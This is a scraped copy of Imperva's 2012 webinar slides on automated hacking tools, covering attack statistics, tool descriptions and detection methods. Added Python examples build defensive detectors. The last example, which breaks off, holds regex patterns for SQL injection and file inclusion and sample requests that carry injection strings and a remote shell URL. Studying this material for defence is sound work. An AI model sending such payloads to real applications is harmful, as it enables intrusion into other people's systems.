Automated Hacking Tools:
The New Rock Stars in the Cyber Underground




              © 2012 Imperva, Inc. All rights reserved.
Agenda

  Context for HII Reports
  Introducing Automated Hacking
     + Quantifying Automation
     + Hacking Automation Use Cases
     + Sample Tools
  Analyzing Real World Data
  Detection and Mitigation
  Questions and Answers




Presenter:
  Amichai Shulman – CTO Imperva

   Speaker at Industry Events
    + RSA, Sybase Techwave, Info Security UK, Black Hat
   Lecturer on Info Security
    + Technion - Israel Institute of Technology
   Former Security Consultant to Banks and
    Financial Services Firms
   Leads the Application Defense Center (ADC)
    + Discovered over 20 commercial application
      vulnerabilities
       – Credited by Oracle, MS-SQL, IBM and others



         Amichai Shulman one of InfoWorld’s “Top 25 CTOs”

HII Report Context

  Hacker Intelligence Initiative is focused on
   understanding how attackers operate in
   practice
      + A different approach from vulnerability research
  Data set composition
      + ~50 real world applications
      + Anonymous Proxies
  More than 18 months of data
  Powerful analysis system
      + Combines analytic tools with drill down capabilities




Introducing Automated Hacking




Quantifying Automation


   [Pie charts: share of manual vs. automatic attack traffic]
      + RFI: Manual 2%, Automatic 98%
      + SQLi: Manual 12%, Automatic 88%




Hacking Automation Use Cases

   Automation affects the magnitude of the threat posed by
    hacking




 Honeypot.org: The Social Dynamics of Hacking

Hacking Automation Use Cases

   Skilled Hackers
     + Create more powerful tools
     + Focus not only on finding vulnerabilities but also on robust
       automation of their exploit (an engineering challenge)
   Professional Hackers (Semi-skilled)
     + Can increase their business faster and more effectively using
       automation
     + Puts more organizations at risk as potential targets
   Unskilled Hackers
     + Increased potential of incidental damages




Hacking Automation Use Cases

   Botnets
      + A step further in the evolution of automated hacking
      + Rather than automating a single task, it automates the entire
        operation
   Includes all steps of the operation
      + Target selection
      + Probing
      + Exploit




Automated Hacking Tools

   Search engine hacking
      + Discovery phase
      + Mostly botnet based today
   General scanners
      + Probing of chosen targets
   Focused on attack type
   Focused on individual vulnerability
      + Exist as standalone tools and botnet modules




Automated Hacking Tools


   High-end
      + Slick GUI (point and click)
      + Evasion techniques
      + State of the art attack vectors
   Havij
      + Focused on SQL Injection attacks
      + Used in attacks by Lulzsec and Anonymous




Automated Hacking Tools


   Professional
      + Command line
      + Ready for instrumentation
   SQLmap
      + Focused on SQL Injection
   FIMAP
      + Focused on Remote File Include




Automated Hacking Tools


   WhiteHat flipping sides
      + Tools aimed at vulnerability scanning
      + Automation is essential for continuous testing of large and
        complex web applications
      + Inherently easier to operate
   Nikto
      + Public domain, low end
   Nessus
      + Public domain (some versions), very friendly GUI
   Acunetix
      + Powerful commercial tool, stolen licenses are shared among
        hackers


Analyzing Real World Data




Type of Automation

   The type of automation is tightly related to the nature of
    the vulnerability to be exploited
   SQL Injection
     + Tools that focus on an individual application at a time
     + High volume, high rate traffic generated against a single
        application
   RFI
     + Tools that try to cover as many applications as possible
     + Low volume traffic when watching a single application
   Search Engine Hacking
     + Need to bypass search engine restrictions
     + Highly distributed botnets


Type of Automation

   RFI Attacks
   Many sources attack more than one target




Persistence of Sources

   A fair amount of attack sources are persistent over time
      + Persistent source = more than 3 days of activity
      + 30% of SQLi attacks
      + 60% of RFI attacks

   [Chart: SQLi attacks per source (log scale, 1 to 10000) against activity days (0 to 100)]

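As an added example (not Imperva's analysis code or data), the classification the "Type of Automation" and "Persistence of Sources" slides describe, carried out in Python over a constructed event sample: each source is profiled by depth (requests per target), breadth (distinct targets) and persistence (more than 3 days of activity, the deck's definition). The event tuples, IP addresses, application names and the depth/breadth thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import date


def build_events():
    """Constructed sample of attack events as (source_ip, target_app, day, attack_type).
    Addresses come from documentation ranges; none of this is real observed traffic."""
    ev = []
    # SQLi tool: 200 requests against one application, all on a single day
    ev += [("198.51.100.7", "shop", date(2012, 3, 1), "SQLi")] * 200
    # SQLi tool that keeps coming back: 12 requests a day against one app for 5 days
    for d in range(1, 6):
        ev += [("192.0.2.44", "forum", date(2012, 3, d), "SQLi")] * 12
    # RFI bot: one probe per application, five applications, four separate days
    for d in (1, 3, 5, 8):
        for app in ("shop", "blog", "forum", "wiki", "portal"):
            ev.append(("203.0.113.5", app, date(2012, 3, d), "RFI"))
    # RFI one-off: two probes against a single application on one day
    ev += [("203.0.113.9", "blog", date(2012, 3, 2), "RFI")] * 2
    return ev


def profile_sources(events):
    """Per source: request count, distinct targets, distinct active days, attack types."""
    stats = defaultdict(lambda: {"requests": 0, "targets": set(),
                                 "days": set(), "types": set()})
    for src, app, day, kind in events:
        s = stats[src]
        s["requests"] += 1
        s["targets"].add(app)
        s["days"].add(day)
        s["types"].add(kind)
    return stats


def classify(stat, depth_threshold=50, breadth_threshold=3):
    """Depth vs breadth, following the deck: SQLi tools generate high volume against a
    single application, RFI tools spread little traffic across many applications.
    Both thresholds are assumed values for the example."""
    n_targets = len(stat["targets"])
    if n_targets >= breadth_threshold:
        return "wide-breadth"
    if stat["requests"] / n_targets >= depth_threshold:
        return "in-depth"
    return "low-volume"


def is_persistent(stat, min_days=3):
    # Deck definition: a persistent source shows more than 3 days of activity
    return len(stat["days"]) > min_days


def persistent_share(stats, attack_type):
    """Fraction of the sources of one attack type that are persistent."""
    srcs = [s for s in stats.values() if attack_type in s["types"]]
    if not srcs:
        return 0.0
    return sum(1 for s in srcs if is_persistent(s)) / len(srcs)


def summarize(events):
    """Map each source to (automation type, persistent?)."""
    stats = profile_sources(events)
    return {src: (classify(s), is_persistent(s)) for src, s in stats.items()}


if __name__ == "__main__":
    events = build_events()
    stats = profile_sources(events)
    for src, (kind, persistent) in sorted(summarize(events).items()):
        print(f"{src:14} {kind:13} persistent={persistent}")
    print("persistent share SQLi:", persistent_share(stats, "SQLi"))
    print("persistent share RFI: ", persistent_share(stats, "RFI"))
```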



Persistence of Sources

   RFI Attacks
   Many consistent attackers




Persistence of Attack Vectors

   RFI Attacks
   Collect URLs that host infection script
   Some URLs are being used consistently over time




Persistence of Attack Vectors

   Many shell URLs are used against more than one target




Country of Origin

   Most attack sources are in the US
   Most high rate automation sources are in China!
   SQLi (all attack sources)                       SQLi (high rate automation sources)
   Country              Hosts   % of Hosts         Country              Hosts   % of Hosts
   USA                   3994           80         China                   98           30
   China                  355            7         USA                     78           24
   United Kingdom          75            2         Netherlands              9            3
   Russian Federation      49            1         Morocco                  8            2
   Canada                  40            1         Egypt                    7            2
   Republic of Korea       33            1         Luxembourg               7            2
   Germany                 31            1         Brazil                   7            2
   Brazil                  29            1         France                   7            2
   India                   28            1         Indonesia                6            2
   France                  24            1         Russian Federation       6            2




Detection and Mitigation




General

   Motivation
     + Automated hacking accounts for a large portion of attack traffic
     + Being able to detect malicious automation dramatically reduces
       the stress on other mechanisms designed to detect specific
       attacks
   Challenge
     + Hard to implement WITHIN applications as automation can be
       applied against each and every part of the application or the
       underlying application server




Detecting Automated Hacking - Passive

   Passive Methods
      + Watch network traffic “as-is”
      + Non intrusive, do not affect user experience
   Traffic Shape Indicators
      + We measure suspicious requests (rather than ALL requests)
      + Measured attributes
          – Rate
          – Rate change (ramp-up speed)
          – Volume
      + Difficult to measure in an inherently noisy source (NAT)
   Request Shape Indicators
      + Missing headers
      + Mismatch between headers and location
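An added example (not Imperva's product code) of the passive indicators on this slide, applied in Python to a constructed stream of requests that an upstream engine has already marked suspicious: per-source rate per time window, ramp-up between windows and total volume, plus the request-shape checks (expected browser headers missing, Host or Referer not matching the protected site). The log line format, hostnames, addresses and thresholds are constructed for the example; the NAT caveat on the slide is why the rate thresholds sit well above what a few humans sharing one address would produce.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Headers a browser sends on every navigation; their absence is a request-shape indicator.
EXPECTED_HEADERS = ("user-agent", "accept", "accept-language")
PROTECTED_HOST = "www.example.com"  # assumed hostname of the protected application


def constructed_log():
    """Constructed sample in a made-up line format:
    <epoch seconds> <source ip> <Host header> <path> <Referer or -> <header names present>
    Every line is a request already classified as suspicious upstream (the slide measures
    suspicious requests, not all requests)."""
    lines, n = [], 0
    # Scanner: 1, then 4, then 10 suspicious requests per 10 s window; User-Agent only
    for window, count in enumerate((1, 4, 10)):
        for i in range(count):
            lines.append(f"{1000 + window * 10 + i} 198.51.100.7 www.example.com "
                         f"/item.php?id={n} - user-agent")
            n += 1
    # Humans behind a NAT: one suspicious hit per window, full headers, same-site Referer
    for ts in (1003, 1015, 1027):
        lines.append(f"{ts} 203.0.113.5 www.example.com /search?q=test "
                     "http://www.example.com/ user-agent,accept,accept-language")
    # Low-rate tool: complete headers but a Referer that points at another host
    for ts in (1005, 1006, 1007, 1008):
        lines.append(f"{ts} 192.0.2.9 www.example.com /login "
                     "http://scanner.example.net/ user-agent,accept,accept-language")
    return "\n".join(lines)


def parse_line(line):
    ts, src, host, path, referer, headers = line.split()
    return {"ts": int(ts), "src": src, "host": host, "path": path,
            "referer": referer, "headers": set(headers.split(","))}


def request_shape_flags(req):
    """Request-shape indicators: missing browser headers, header/location mismatches."""
    flags = [f"missing:{h}" for h in EXPECTED_HEADERS if h not in req["headers"]]
    if req["host"] != PROTECTED_HOST:
        flags.append("host-mismatch")
    # A cross-site Referer is normal for a search-engine visitor, so alone it is weak
    # evidence; it only counts once the source has some volume (see analyze()).
    if req["referer"] != "-" and urlsplit(req["referer"]).hostname != req["host"]:
        flags.append("referer-host-mismatch")
    return flags


def analyze(log_text, window=10, rate_threshold=8, ramp_threshold=5,
            shape_ratio=0.5, min_volume=3):
    """Traffic-shape (rate, ramp-up, volume) and request-shape scoring per source.
    Thresholds are assumed; keep them high because a NAT address aggregates many users."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            req = parse_line(line)
            by_src[req["src"]].append(req)
    report = {}
    for src, reqs in by_src.items():
        buckets = defaultdict(int)
        for r in reqs:
            buckets[r["ts"] // window] += 1
        counts = [buckets[k] for k in sorted(buckets)]
        peak = max(counts)                                                  # rate
        ramp = max((b - a for a, b in zip(counts, counts[1:])), default=0)  # ramp-up
        ratio = sum(1 for r in reqs if request_shape_flags(r)) / len(reqs)
        reasons = []
        if peak >= rate_threshold:
            reasons.append("rate")
        if ramp >= ramp_threshold:
            reasons.append("ramp-up")
        if len(reqs) >= min_volume and ratio >= shape_ratio:
            reasons.append("request-shape")
        report[src] = {"volume": len(reqs), "peak_rate": peak, "ramp_up": ramp,
                       "shape_ratio": ratio, "reasons": reasons}
    return report


if __name__ == "__main__":
    for src, r in analyze(constructed_log()).items():
        verdict = "automated" if r["reasons"] else "not flagged"
        print(f"{src:14} volume={r['volume']:3} peak={r['peak_rate']:3} "
              f"ramp={r['ramp_up']:3} shape={r['shape_ratio']:.2f} -> {verdict} {r['reasons']}")
```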



Detecting Automated Hacking - Active

   Introduce changes into the server response
      + Test client’s reaction to changes
      + May affect user experience – use with care
      + Verify type of user agent
   Browsers support Javascript and an appropriate DOM
      + Client is expected to complete some computation
      + Application / GW can validate the computed value
   Browsers comply with HTML tags (IMG, IFRAME)
      + Client is expected to access resource referenced by embedded
        tags
      + Failure to access the resources implies that client is an
        automated script


Mitigation - Wisdom of the Crowds

   Detected automation feeds into building fingerprints of
    tools and reputation data for sources
   Leveraged when data is collected within a community
   Recent regulatory changes endorse the concept of
    community
   Drop requests matching fingerprints or coming from ill
    reputed sources




Mitigation – Challenges and Metering

   Introduce changes to the response that
    require a true browser user-agent before
    letting any further requests within a
    session
      + Application / GW keeps sending the test for any
        request not in a validated session
      + A session is validated only if user-agent
        responds properly
   Introduce changes to the response that
    (based on the previous enforcement)
    introduce client side latency
      + Challenge the client to solve a mathematical
        riddle
      + Partial hash collisions are a good example
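As an added example (not Imperva's implementation), the active check from "Detecting Automated Hacking - Active" and the challenge/metering scheme of this slide in Python: a gateway that answers every request from a not-yet-validated session with a partial-hash-collision puzzle, validates the session once the client returns a correct solution, and otherwise keeps sending the test; the solver plays the part of the JavaScript shipped with the challenge, which a real browser would run. The leading-zero-bit count, session identifiers and nonce format are assumptions for the example.

```python
import hashlib
import os
from typing import Optional

# Metering knob (assumed value): each extra bit roughly doubles the client's expected work,
# so this sets how much client-side latency the gateway imposes per new session.
LEADING_ZERO_BITS = 16


def solves(nonce: bytes, answer: int, bits: int) -> bool:
    """Partial hash collision: SHA-256(nonce || answer) must start with `bits` zero bits."""
    digest = hashlib.sha256(nonce + answer.to_bytes(8, "big")).digest()
    return int.from_bytes(digest, "big") >> (256 - bits) == 0


class ChallengeGateway:
    """Application / GW in front of the application. A session is validated only after it
    returns a correct solution; until then every request gets the challenge instead of
    the application's response."""

    def __init__(self, bits: int = LEADING_ZERO_BITS):
        self.bits = bits
        self.pending = {}        # session id -> nonce awaiting a solution
        self.validated = set()   # sessions that proved they can run client-side code

    def handle_request(self, session_id: str, answer: Optional[int] = None):
        if session_id in self.validated:
            return ("pass", None)               # the real response would be served here
        nonce = self.pending.get(session_id)
        if nonce is not None and answer is not None and solves(nonce, answer, self.bits):
            del self.pending[session_id]        # single use: a solution cannot be replayed
            self.validated.add(session_id)
            return ("pass", None)
        # No solution, or a wrong one: keep sending the test, with a fresh nonce each time
        nonce = os.urandom(16)
        self.pending[session_id] = nonce
        return ("challenge", {"nonce": nonce.hex(), "bits": self.bits})


def solve_challenge(challenge: dict) -> int:
    """Client side: the computation the JavaScript delivered with the challenge performs
    in a browser. A script that ignores the response body never gets past the gateway."""
    nonce = bytes.fromhex(challenge["nonce"])
    answer = 0
    while not solves(nonce, answer, challenge["bits"]):
        answer += 1
    return answer


if __name__ == "__main__":
    gw = ChallengeGateway()
    status, challenge = gw.handle_request("browser-session")
    print("first request:", status)
    answer = solve_challenge(challenge)
    print("after solving:", gw.handle_request("browser-session", answer)[0])
    print("next request :", gw.handle_request("browser-session")[0])
    print("script that never answers:", gw.handle_request("script-session")[0])
```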


Mitigation (cont.)

   Introduce CAPTCHA or other test to tell apart a human
    operator from a script




Summary

  Automation is ruling the threat landscape
      + It accounts for the lion's share of attack traffic

  Automation is used in various forms
      + In depth scanning / attack of a single target
      + Wide breadth scanning / attack of multiple applications
      + Distributed scanning / attack of single / multiple applications




Summary (cont.)


   Detection and mitigation are essential for reducing noise
    and focusing resources on the most complex attacks
   Detection and mitigation are most effectively deployed
    outside of the application
   Detection and mitigation must include a combination of
    passive and active measures
   Detection and mitigation are best utilized within a
    community that can generate reputation data



Webinar Materials

    Join Our LinkedIn Group, Imperva Data Security Direct for…
      + Post-Webinar Discussions
      + Answers to Attendee Questions
      + Webinar Recording Link
      + Webinar Slides


www.imperva.com





Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 

Dernier (20)

UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 Workshop
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-py
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 

Automated Hacking Tools - Meet the New Rock Stars in the Cyber Underground

1. Automated Hacking Tools: The New Rock Stars in the Cyber Underground
   © 2012 Imperva, Inc. All rights reserved.

2. Agenda
  - Context for HII Reports
  - Introducing Automated Hacking
    + Quantifying Automation
    + Hacking Automation Use Cases
    + Sample Tools
  - Analyzing Real World Data
  - Detection and Mitigation
  - Questions and Answers

3. Presenter: Amichai Shulman – CTO, Imperva
  - Speaker at industry events
    + RSA, Sybase Techwave, Info Security UK, Black Hat
  - Lecturer on information security
    + Technion - Israel Institute of Technology
  - Former security consultant to banks and financial services firms
  - Leads the Application Defense Center (ADC)
    + Discovered over 20 commercial application vulnerabilities
      – Credited by Oracle, MS-SQL, IBM and others
  - Amichai Shulman is one of InfoWorld's "Top 25 CTOs"

4. HII Report Context
  - The Hacker Intelligence Initiative is focused on understanding how attackers operate in practice
    + A different approach from vulnerability research
  - Data set composition
    + ~50 real world applications
    + Anonymous proxies
  - More than 18 months of data
  - Powerful analysis system
    + Combines analytic tools with drill-down capabilities

5. Introducing Automated Hacking

6. Quantifying Automation

7. Quantifying Automation
  - RFI: Automatic 98%, Manual 2%
  - SQLi: Automatic 88%, Manual 12%

8. Hacking Automation Use Cases
  - Automation affects the magnitude of the threat posed by hacking
  - Source: Honeynet.org, "The Social Dynamics of Hacking"

9. Hacking Automation Use Cases
  - Skilled hackers
    + Create more powerful tools
    + Focus not only on finding vulnerabilities but also on robust automation of their exploits (an engineering challenge)
  - Professional (semi-skilled) hackers
    + Can grow their business faster and more effectively using automation
    + Puts more organizations at risk as potential targets
  - Unskilled hackers
    + Increased potential for incidental damage

10. Hacking Automation Use Cases
  - Botnets
    + A step further in the evolution of automated hacking
    + Rather than automating a single task, automation of the entire operation
  - Includes all steps of the operation
    + Target selection
    + Probing
    + Exploit

11. Automated Hacking Tools
  - Search engine hacking
    + Discovery phase
    + Mostly botnet based today
  - General scanners
    + Probing of chosen targets
  - Focused on attack type
  - Focused on individual vulnerability
    + Exist as standalone tools and botnet modules
12. Automated Hacking Tools
  - High-end
    + Slick GUI (point and click)
    + Evasion techniques
    + State of the art attack vectors
  - Havij
    + Focused on SQL Injection attacks
    + Used in attacks by LulzSec and Anonymous
13. Automated Hacking Tools
14. Automated Hacking Tools
  - Professional
    + Command line
    + Ready for instrumentation
  - SQLmap
    + Focused on SQL Injection
  - FIMAP
    + Focused on Remote File Include
15. Automated Hacking Tools
16. Automated Hacking Tools
  - WhiteHat flipping sides
    + Tools aimed at vulnerability scanning
    + Automation is essential for continuous testing of large and complex web applications
    + Inherently easier to operate
  - Nikto
    + Public domain, low end
  - Nessus
    + Public domain (some versions), very friendly GUI
  - Acunetix
    + Powerful commercial tool; stolen licenses are shared among hackers
17. Analyzing Real World Data

18. Type of Automation
  - The type of automation is tightly related to the nature of the vulnerability being exploited
  - SQL Injection
    + Tools that focus on an individual application at a time
    + High volume, high rate traffic generated against a single application
  - RFI
    + Tools that try to cover as many applications as possible
    + Low volume traffic when watching a single application
  - Search engine hacking
    + Needs to bypass search engine restrictions
    + Highly distributed botnets

19. Type of Automation

20. Type of Automation
  - RFI attacks
  - Many sources attack more than one target
21. Persistence of Sources
  - A fair number of attack sources are persistent over time
    + Persistent source = more than 3 days of activity
    + 30% of SQLi attacks
    + 60% of RFI attacks
  [Chart: number of SQLi attacks (log scale) by activity days, 0 to 100]
22. Persistence of Sources
  - RFI attacks
  - Many consistent attackers

23. Persistence of Attack Vectors
  - RFI attacks
  - Collect the URLs that host the infection script
  - Some URLs are used consistently over time

24. Persistence of Attack Vectors
  - Many shell URLs are used against more than one target
25. Country of Origin
  - Most attack sources are in the US
  - Most high rate automation sources are in China!

  SQLi, all attack sources               SQLi, high rate automation sources
  Country              Hosts  % of Hosts   Country              Hosts  % of Hosts
  USA                   3994      80       China                   98      30
  China                  355       7       USA                     78      24
  United Kingdom          75       2       Netherlands              9       3
  Russian Federation      49       1       Morocco                  8       2
  Canada                  40       1       Egypt                    7       2
  Republic of Korea       33       1       Luxembourg               7       2
  Germany                 31       1       Brazil                   7       2
  Brazil                  29       1       France                   7       2
  India                   28       1       Indonesia                6       2
  France                  24       1       Russian Federation       6       2
26. Detection and Mitigation
27. General
  - Motivation
    + Automated hacking accounts for a large portion of attack traffic
    + Being able to detect malicious automation dramatically reduces the load on the other mechanisms designed to detect specific attacks
  - Challenge
    + Hard to implement WITHIN applications, as automation can be applied against each and every part of the application or the underlying application server

28. Detecting Automated Hacking - Passive
  - Passive methods
    + Watch network traffic "as-is"
    + Non-intrusive, do not affect user experience
  - Traffic shape indicators
    + We measure suspicious requests (rather than ALL requests)
    + Measured attributes
      – Rate
      – Rate change (ramp-up speed)
      – Volume
    + Difficult to measure for an inherently noisy source (NAT)
  - Request shape indicators
    + Missing headers
    + Mismatch between headers and location
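The passive indicators on this slide (rate, ramp-up speed and volume of suspicious requests per source, missing headers, header/location mismatch), together with the single-target versus multi-target distinction and the "more than 3 days" persistence measure from the Type of Automation and Persistence slides, worked through as an added example. This is not code from the deck or from Imperva's product: the log records are constructed, and the payload patterns, the choice of Referer host versus requested host as the "mismatch" check, the 60-second window and the rate threshold are all assumptions made for illustration.

```python
# Passive automation indicators over access-log style records. Added example,
# not the deck's or Imperva's code; records, patterns and thresholds are constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Coarse payload patterns: only *suspicious* requests feed the per-source statistics.
SQLI_RE = re.compile(r"(?i)(union\s+(all\s+)?select|'\s*or\s+'?\d|;\s*--|\bsleep\s*\(|benchmark\s*\()")
RFI_RE = re.compile(r"(?i)=(https?|ftp)://")     # parameter value is a remote URL (redirect params hit this too)
REQUIRED_HEADERS = ("User-Agent", "Accept", "Accept-Language")


def classify(request):
    """'rfi', 'sqli' or None for one request line (method + path + query)."""
    if RFI_RE.search(request):
        return "rfi"
    return "sqli" if SQLI_RE.search(request) else None


def header_anomalies(rec):
    """Request-shape indicators: headers every browser sends are absent, or the
    Referer names another site than the one requested (weak alone: cross-site links do this)."""
    hdrs = rec["headers"]
    issues = ["missing:" + h for h in REQUIRED_HEADERS if h not in hdrs]
    m = re.match(r"https?://([^/]+)", hdrs.get("Referer", ""))
    if m and m.group(1).lower() != rec["host"].lower():
        issues.append("referer-host-mismatch")
    return issues


def label(p, high_rate=5):
    """Map a profile onto the deck's automation types; many user agents behind one
    address is the NAT case, where rate indicators are not trustworthy."""
    if p["user_agents"] > 2:
        return "noisy source (NAT?)"
    if p["targets"] == 1 and p["peak_per_window"] >= high_rate:
        return "single-target high-rate tool"
    return "multi-target scanner" if p["targets"] > 1 else "undetermined"


def profile_sources(records, window=timedelta(seconds=60)):
    """Per-source traffic-shape statistics over suspicious requests: rate (peak per
    window), ramp-up (requests in the first window), volume, fan-out and persistence."""
    hits = defaultdict(list)
    for rec in records:
        kind = classify(rec["request"])
        if kind:
            hits[rec["src"]].append((rec["ts"], rec, kind))
    profiles = {}
    for src, events in hits.items():
        events.sort(key=lambda e: e[0])
        times = [e[0] for e in events]
        peak = j = 0
        for i, t in enumerate(times):            # sliding window over sorted timestamps
            while t - times[j] > window:
                j += 1
            peak = max(peak, i - j + 1)
        days = {t.date() for t in times}
        p = {"kinds": sorted({e[2] for e in events}),
             "suspicious": len(events),
             "targets": len({e[1]["host"] for e in events}),
             "peak_per_window": peak,
             "first_window": sum(1 for t in times if t - times[0] <= window),
             "active_days": len(days),
             "persistent": len(days) > 3,          # the deck's definition: more than 3 days
             "header_anomalies": sum(1 for e in events if header_anomalies(e[1])),
             "user_agents": len({e[1]["headers"].get("User-Agent") for e in events})}
        p["label"] = label(p)
        profiles[src] = p
    return profiles


def _rec(ts, src, host, request, headers):
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "src": src,
            "host": host, "request": request, "headers": headers}

TOOL_HDRS = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)", "Accept": "*/*"}
SCANNER_HDRS = {"User-Agent": "libwww-perl/5.837"}
BROWSER_HDRS = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1) Firefox/10.0",
                "Accept": "text/html", "Accept-Language": "en-US"}
SHELL = "http://203.0.113.200/shell.txt?"

# Constructed sample log (not real traffic): a SQLi tool, an RFI scanner, a browser, a NAT.
SAMPLE_LOG = (
    [_rec(f"2012-03-01 10:00:{5 * i:02d}", "198.51.100.7", "shop.example",
          f"GET /item.php?id=1' UNION SELECT {i},2,3--", TOOL_HDRS) for i in range(8)]
    + [_rec("2012-03-01 03:12:00", "203.0.113.9", "blog.example", "GET /index.php?page=" + SHELL, SCANNER_HDRS),
       _rec("2012-03-02 14:40:00", "203.0.113.9", "wiki.example", "GET /index.php?page=" + SHELL, SCANNER_HDRS),
       _rec("2012-03-04 22:05:00", "203.0.113.9", "shop.example", "GET /view.php?inc=" + SHELL, SCANNER_HDRS),
       _rec("2012-03-05 01:30:00", "203.0.113.9", "forum.example", "GET /index.php?page=" + SHELL, SCANNER_HDRS)]
    + [_rec("2012-03-01 10:02:00", "192.0.2.5", "shop.example", "GET /item.php?id=7", BROWSER_HDRS),
       _rec("2012-03-01 10:02:30", "192.0.2.5", "shop.example", "GET /cart.php", BROWSER_HDRS)]
    + [_rec("2012-03-01 10:05:00", "192.0.2.77", "shop.example", "GET /login.php?user=admin' OR '1'='1",
            dict(BROWSER_HDRS, Referer="http://search.example/q?shop")),
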